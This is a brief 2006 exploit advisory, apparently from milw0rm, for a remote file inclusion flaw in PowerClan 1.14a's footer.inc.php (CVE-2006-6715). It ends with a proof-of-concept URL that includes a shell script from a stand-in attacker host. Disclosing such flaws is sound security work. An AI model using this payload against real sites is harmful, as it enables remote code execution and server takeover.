PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion

Related Vulnerabilities: CVE-2006-6715  
Publish Date: 21 Dec 2006
Author: nuffsaid
+ PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability
+ Vendor ............: http://www.powerscripts.org/
+ Affected Software .: PowerClan <= 1.14a
+ Download ..........: http://ftp.powerscripts.org/pc/powerclan114a.zip
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+ Details:
+ PowerClan footer.inc.php does not initialize the $settings[footer] variable before using it
+ to include files, assuming register_globals = on, we can initialize the variable in a query
+ string and include a remote file of our choice.
+ Vulnerable Code:
+ footer.inc.php, line(s) 24:
+ -> 24: include($settings[footer]);
+ Proof Of Concept:
+ http://[target]/[path]/footer.inc.php?settings[footer]=http://evilsite.com/shell.php

# milw0rm.com [2006-12-21]